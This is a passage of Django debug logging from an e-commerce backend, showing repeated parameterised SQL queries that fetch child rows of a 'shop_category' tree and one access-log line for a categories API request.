"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:40:36,304 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:40:36,310 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:40:36,314 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:40:36,319 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:40:36,322 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:40:36,325 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:40:36,328 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:40:36,330 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:40:36,332 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:40:36,335 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:40:36,337 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:40:36,340 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:40:36,342 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:40:36,345 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:40:36,347 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:40:36,349 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:40:36,352 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:40:36,355 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:40:36,357 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:40:36,359 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:40:36,361 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:40:36,363 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:40:36,367 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:40:36,369 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:40:36,371 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:40:36,373 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:40:36,375 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:40:36,379 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:40:36,381 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:40:36,383 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:40:36,385 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:40:36,388 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:40:36,392 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:40:36,394 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:40:36,397 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:40:36,399 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:40:36,402 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:40:36,404 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:40:36,407 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:40:36,409 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:40:36,412 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:40:36,415 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:40:36,417 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:40:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:43:09,521 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:43:09,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:43:09,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:43:09,543 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:43:09,549 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:43:09,553 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:43:09,558 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:43:09,562 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:43:09,566 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:43:09,573 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:43:09,577 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:43:09,581 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:43:09,585 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:43:09,589 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:43:09,595 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:43:09,599 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:43:09,606 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:43:09,612 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:43:09,617 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:43:09,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:43:09,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:43:09,631 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:43:09,635 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:43:09,639 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 